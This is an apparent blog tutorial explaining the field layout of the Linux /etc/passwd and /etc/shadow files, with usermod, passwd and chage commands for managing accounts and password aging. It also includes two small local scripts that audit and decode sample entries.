/etc/passwd file vs /etc/shadow file


Outcomes :

You will have a decent understanding of the format of the passwd and shadow files.

You will be able to customize your user accounts according to your needs.

-----------------------------------------------------------------------------------------------------------------------------

The passwd and shadow files store the details of the existing users of the operating system, and a change to the details of any user account is reflected in these files. First, let's create a user named naruto using the adduser command.

Command 1:

sudo adduser naruto

Fig : 1.0


And you can see that we are prompted to assign a password, and a home directory naruto is created. We are also prompted to enter details like full name, room number and so on, which I have skipped by hitting Enter.

Now let's see the user details in the /etc/passwd file.

Passwd file : 


Fig : 1.1


And in Fig : 1.1 you can see a line starting with the user naruto, but wait a minute, what is this whole thing:

naruto : x : 1004 : 1004 : , , , : /home/naruto : /bin/bash
   1     2    3      4       5          6             7

1 : denotes the username

We can change the username (Fig : 1.2) by using the command:

syntax :

sudo usermod -l NewUserName ExistingUserName

sudo usermod -l hinata naruto

Fig : 1.2




2 : The character ‘x’ indicates that the hashed version of the password is stored in the /etc/shadow file, which we will talk about later in this blog.

3 : This denotes the user id (every user on the system is given a user id).

We can change the user id of the existing user naruto (Fig : 1.3) using the command:

syntax 

sudo usermod -u userid username 

sudo usermod -u 2000 naruto

Fig : 1.3




4 : This denotes the group id (when we create a user, a group with the name of the user is automatically created as well, and the user account itself is added to that group).

We can change the group id of the group (Fig : 1.3) using the command:

syntax : 

sudo groupmod -g groupid groupname

sudo groupmod -g 2000 naruto

5 : This represents extra info like full name, room number, work phone and other details (also known as comments) that we skipped earlier; if filled in, they would be displayed here.

6 : It represents the home directory of the user.

We can change the home directory of the user (Fig : 1.4) using the command:

syntax 

sudo usermod -m -d PathToTheDirectory username

sudo usermod -m -d /home/bob naruto

Fig : 1.4 



7 : It represents the shell that is used by the user account.

We can change the shell of the user (Fig : 1.5) using the command:

syntax 

sudo usermod --shell shell username or sudo usermod -s shell username

sudo usermod --shell /bin/sh naruto

Fig : 1.5




In a nutshell, the format looks like this:

naruto:x:1004:1004:,,,:/home/naruto:/bin/bash

[username]:[x]:[UID]:[GID]:[comment]:[home_directory]:[default_shell]
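
The seven-field layout above can be checked mechanically. The following is an added example, not part of the original post: an awk-based audit that flags entries whose password field is not x, extra accounts with UID 0, and UIDs shared by two usernames. The function names audit_passwd and sample_passwd and every sample account except naruto are constructed for illustration.

```shell
# Constructed sample in /etc/passwd format (not taken from a real host).
sample_passwd() {
cat <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
naruto:x:1004:1004:,,,:/home/naruto:/bin/bash
backup2:x:0:0::/root:/bin/sh
guest::1005:1005::/home/guest:/bin/bash
legacy:$1$constructed$hash:1004:1006::/home/legacy:/bin/sh
EOF
}

# audit_passwd reads passwd-format lines on stdin and prints one finding per line.
audit_passwd() {
  awk -F: '
    # Every entry must have exactly the 7 fields described above.
    NF != 7                 { print "BAD_FIELD_COUNT " $1; next }
    # UID 0 means root privileges, whatever the username says.
    $3 == 0 && $1 != "root" { print "EXTRA_UID0 " $1 }
    # Field 2 should be "x" (hash kept in /etc/shadow); empty means no password.
    $2 == ""                { print "EMPTY_PASSWORD " $1 }
    $2 != "" && $2 != "x" && $2 !~ /^[*!]/ { print "HASH_IN_PASSWD " $1 }
    # Two names on one UID are the same user as far as permissions go.
    ($3 in seen)            { print "DUPLICATE_UID " $1 " (same UID as " seen[$3] ")" }
    !($3 in seen)           { seen[$3] = $1 }
  '
}

sample_passwd | audit_passwd
```

On a real system the same function can be fed with: audit_passwd < /etc/passwd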


Shadow file : 

Fig : 1.6 


Let me break it down into meaningful pieces and elaborate (Fig : 1.7).

Fig : 1.7 



1) This is simply the username.

2) This denotes the hashed password. The prefix at its start tells us what type of hash is used for the password.

Identification : 
$1$      -     MD5
$2a$    -     Blowfish
$2y$    -     Eksblowfish
$5$      -     SHA-256
$6$      -     SHA-512crypt
$y$      -     crypt

Here our hashed password starts with $6$, which means it uses the SHA-512 algorithm.

Well, if you couldn't find yours, you could find it here.

Before talking about the 3rd field we need to know about the epoch time system, which is also known as the Unix time system. This time system takes 1970 January 1st 00:00:00 UTC as its reference and counts the number of seconds from then on. To view the present date in epoch time (Fig : 1.8):

Command : 

expr $( date +%s )

Fig : 1.8




This means 1654154766 seconds have passed since 1970 1st January. You can divide it by 86400 seconds (24 hours) to get the number of days from 1970 1st January till this day (Fig : 1.9).

Fig : 1.9



So today is 19145 days from 1970 1st Jan, and this is called the epoch value.

To get the current date from the epoch value (Fig : 2.0):

Command : 

date -d "1970-01-01 19144 days"

Fig : 2.0


You can see the current date in the above Fig : 2.0

3) 19144 is the epoch value, and it denotes when we last changed the password, in other words the most recent day we changed the password for the account (Fig : 2.1).

Fig : 2.1


As you can see in the above Fig : 2.1, after changing the password the epoch value changed accordingly.

4) Minimum password age: this denotes the minimum number of days that must pass before we can change the password again. In our case the value is zero, which means we can change the password whenever we want to. For example, if the value is set to 2 days, we need to wait for 2 days to change the password.

5) Maximum password age: this denotes the maximum number of days we can use the password; after that our password is expired and we are forced to change it. In our case it's 99999, which means our password will not expire for many, many years.

6) Warning period: this denotes how many days before the password expiry the user should get an alert. In our case it is set to 7.

Well let’s see an example regarding all these shall we !!

Fig : 2.2



Fig : 2.3


In Fig : 2.2 the min password age is set to 0, max is set to 99999 and warning is set to 7, which means we can change the password whenever we want to, our account will not expire for many, many years, and we will get an alert starting 7 days before the password expiry.

In Fig : 2.3 here’s where things get interesting

Command

sudo passwd -x 10 -n 2 -w 11 naruto

-x  : denotes max password age

-n : denotes min password age

-w : denotes warning period

And you can see we couldn't change the password immediately, because the min password age is set to 2 days. You can see the warning as well, because we said to show it 11 days before the expiration and there are only 10 days left for the account to expire. This means that every single day for 10 days, till the password of your account expires, you will get the alert message, and after that you are forced to change the password.

7) This denotes the inactive period. In our case it's empty. For instance, if it is set to 10, then 10 days of not logging in after the password expiration of the account will disable your account.

We can set the inactive period (Fig : 2.4) using the command:

syntax : 

sudo passwd -i NumberInactiveDays username

sudo passwd -i 10 naruto


Fig : 2.4


8) This denotes the expiration date of the account as an epoch value. In our case it is empty.

We can set an expiration date for an account (Fig : 2.4) using the command:

syntax : 

sudo chage -E "ExpirationDate" username

sudo chage -E "2022-08-16" naruto


9) This position is reserved for future use.

Extra tip : 

You can see an exclamation mark at the start of the hashed password, which indicates that the account is disabled or locked. Even if you enter the right credentials, it returns an authentication failure on the screen; the only way of accessing the account is by enabling it (Fig : 2.5).

Fig : 2.5



We can disable and enable any account using the passwd command:

To disable or lock any account : 

sudo passwd -l username

To enable or unlock any account :

sudo passwd -u username
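
To tie fields 2 to 8 and the lock marker together, here is an added example (not part of the original post) that turns one shadow entry into calendar dates. The function names day2date and shadow_report are constructed for illustration, the salt and hash are placeholders, and the aging values are the ones used above (changed on day 19144, -n 2 -x 10 -w 11, -i 10, expiry 2022-08-16); it assumes a date command that accepts -d "@seconds", as GNU date does.

```shell
# Constructed entries in /etc/shadow format; salt and hash are placeholders.
SAMPLE='naruto:$6$constructedsalt$constructedhash:19144:2:10:11:10:19220:'
LOCKED='naruto:!$6$constructedsalt$constructedhash:19144:0:99999:7:::'

# Convert "days since 1970-01-01" (fields 3 and 8) to YYYY-MM-DD in UTC.
day2date() { date -u -d "@$(( $1 * 86400 ))" +%F; }

# Print what fields 2-8 of one shadow entry mean, as key=value lines.
shadow_report() (
  IFS=: read -r user hash last min max warn inact exp rest <<EOF
$1
EOF
  echo "user=$user"
  case "$hash" in
    '!'*) echo "locked=yes" ;;            # "!" prefix, as written by passwd -l
    *)    echo "locked=no" ;;
  esac
  h=${hash#\!}                            # drop the lock marker, if any
  case "$h" in
    '$'*) h=${h#?}; echo "hash_id=${h%%\$*}" ;;   # text between the first two "$"
  esac
  if [ -n "$last" ]; then                 # empty field 3 means no aging data
    echo "last_change=$(day2date "$last")"
    echo "earliest_next_change=$(day2date $(( last + ${min:-0} )))"
    if [ -n "$max" ]; then
      echo "password_expires=$(day2date $(( last + max )))"
      echo "warning_starts=$(day2date $(( last + max - ${warn:-0} )))"
      [ -z "$inact" ] || echo "login_refused_after=$(day2date $(( last + max + inact )))"
    fi
  fi
  [ -z "$exp" ] || echo "account_expires=$(day2date "$exp")"
)

shadow_report "$SAMPLE"
shadow_report "$LOCKED"
```

For the first entry the warning start falls one day before the last change, because the warning period (11) is longer than the maximum age (10); that is why the warning shows up immediately in the passwd -x 10 -n 2 -w 11 example.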

                                    Thank You

                                                          

